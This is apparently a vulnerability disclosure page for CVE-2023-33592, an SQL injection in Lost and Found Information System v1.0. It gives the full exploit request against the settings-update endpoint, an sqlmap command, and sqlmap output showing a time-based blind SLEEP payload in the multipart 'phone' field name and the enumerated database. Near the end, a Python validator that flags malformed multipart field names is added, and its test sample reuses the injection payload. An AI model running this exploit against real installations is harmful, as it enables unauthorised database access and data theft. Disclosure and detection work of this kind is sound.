Headline
CVE-2023-33592: CVE/CVE-2023-33592 at main · DARSHANAGUPTA10/CVE
Lost and Found Information System v1.0 was discovered to contain a SQL injection vulnerability via the component /php-lfis/admin/?page=system_info/contact_information.
# Exploit Title: Lost and Found Information System v1.0 - SQL Injection
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
# Version: V1.0.0
# Tested on: Linux

REQUEST

POST /php-lfis/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
Content-Length: 454
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="94"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2NerUgrr08nxdAqe
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/php-lfis/admin/?page=system_info/contact_information
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=fncg346s7j3fr654lsapbb8sqs
Connection: close

------WebKitFormBoundary2NerUgrr08nxdAqe
Content-Disposition: form-data; name="phone"

1234567890
------WebKitFormBoundary2NerUgrr08nxdAqe
Content-Disposition: form-data; name="mobile"

1234567890
------WebKitFormBoundary2NerUgrr08nxdAqe
Content-Disposition: form-data; name="email"

[email protected]
------WebKitFormBoundary2NerUgrr08nxdAqe
Content-Disposition: form-data; name="address"

test1
------WebKitFormBoundary2NerUgrr08nxdAqe--

sqlmap -r lfis.txt --random-agent --batch --tamper=space2comment --dbs

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:21:18 /2023-05-11/

[22:21:18] [INFO] parsing HTTP request from 'lfis.txt'
[22:21:18] [INFO] loading tamper module 'space2comment'
[22:21:18] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
Multipart-like data found in POST body. Do you want to process it? [Y/n/q] Y
[22:21:18] [INFO] resuming back-end DBMS 'mysql'
[22:21:18] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: MULTIPART phone ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: ------WebKitFormBoundarydhpsLF47Y6ZvrvP2
Content-Disposition: form-data; name="phone''' AND (SELECT 1875 FROM (SELECT(SLEEP(5)))oGnm) AND 'hBeF'='hBeF
------WebKitFormBoundarydhpsLF47Y6ZvrvP2
Content-Disposition: form-data; name="mobile"

1234567890
------WebKitFormBoundarydhpsLF47Y6ZvrvP2
Content-Disposition: form-data; name="email"

[email protected]
------WebKitFormBoundarydhpsLF47Y6ZvrvP2
Content-Disposition: form-data; name="address"

test
------WebKitFormBoundarydhpsLF47Y6ZvrvP2--
---
[22:21:18] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[22:21:18] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.1.17, Apache 2.4.56
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[22:21:18] [INFO] fetching database names
[22:21:18] [INFO] fetching number of databases
[22:21:18] [WARNING] time-based comparison requires larger statistical model, please wait… (done)
[22:21:18] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[22:21:18] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[22:21:18] [ERROR] unable to retrieve the number of databases
[22:21:18] [INFO] falling back to current database
[22:21:18] [INFO] fetching current database
[22:21:18] [INFO] resumed: lfis_db
available databases [1]:
[*] lfis_db

[22:21:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/localhost'
[22:21:18] [WARNING] your sqlmap version is outdated

[*] ending @ 22:21:18 /2023-05-11/
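In the sqlmap payload above, the altered part is the multipart `Content-Disposition` line for `phone`. The following is an added example, not code from the advisory or from the application: a Python check that audits the part names in a `multipart/form-data` body against an allowlist and flags any disposition line that is not a single, cleanly quoted identifier. It assumes the four field names in the request are the only legitimate ones; `audit_multipart`, `build_body` and the sample bodies are hypothetical and constructed for illustration.

```python
import re

# Field names seen in the request on this page; treating them as the full allowlist is an assumption.
ALLOWED_FIELDS = frozenset({"phone", "mobile", "email", "address"})
# Strict shape: exactly one quoted identifier and nothing after the closing quote.
STRICT_DISPOSITION = re.compile(
    rb'content-disposition:\s*form-data;\s*name="([A-Za-z0-9_]{1,64})"', re.I)

def audit_multipart(content_type, body, allowed=ALLOWED_FIELDS):
    """Return [(field, verdict)]; verdict is 'ok', 'unexpected' or 'malformed'."""
    m = re.search(r'boundary="?([^";]+)', content_type)
    if not m:
        raise ValueError("no multipart boundary in Content-Type")
    delim = b"--" + m.group(1).encode("ascii")
    findings = []
    for chunk in body.split(delim)[1:]:      # element [0] is the preamble
        if chunk.startswith(b"--"):          # closing delimiter reached
            break
        head = chunk.lstrip(b"\r\n").split(b"\r\n\r\n", 1)[0]
        disp = next((h for h in head.split(b"\r\n")
                     if h.lower().startswith(b"content-disposition:")), b"")
        hit = STRICT_DISPOSITION.fullmatch(disp.strip())
        if hit is None:
            findings.append((disp.decode("latin-1"), "malformed"))
        else:
            name = hit.group(1).decode("ascii")
            findings.append((name, "ok" if name in allowed else "unexpected"))
    return findings

def build_body(boundary, parts):
    """Assemble a multipart body from (disposition_line, value) pairs (sample-data helper)."""
    out = b"".join(b"--" + boundary + b"\r\n" + d + b"\r\n\r\n" + v + b"\r\n"
                   for d, v in parts)
    return out + b"--" + boundary + b"--\r\n"

CT = "multipart/form-data; boundary=----WebKitFormBoundary2NerUgrr08nxdAqe"
B = b"----WebKitFormBoundary2NerUgrr08nxdAqe"
D = b"Content-Disposition: form-data; name="
# Constructed sample inputs; the values are placeholders.
BENIGN = build_body(B, [(D + b'"phone"', b"1234567890"), (D + b'"mobile"', b"1234567890"),
                        (D + b'"email"', b"user@example.test"), (D + b'"address"', b"test1")])
# First part reuses the disposition line from the sqlmap payload shown above.
TAMPERED = build_body(B, [
    (D + b"\"phone''' AND (SELECT 1875 FROM (SELECT(SLEEP(5)))oGnm) AND 'hBeF'='hBeF", b""),
    (D + b'"mobile"', b"1234567890"),
    (D + b'"is_admin"', b"1")])

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("tampered", TAMPERED)):
        print(label, audit_multipart(CT, body))
```

A check like this is a detection and input-validation layer only; it does not replace parameterized queries in the handler that writes the settings.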
Related news
Lost and Found Information System version 1.0 suffers from a remote SQL injection vulnerability.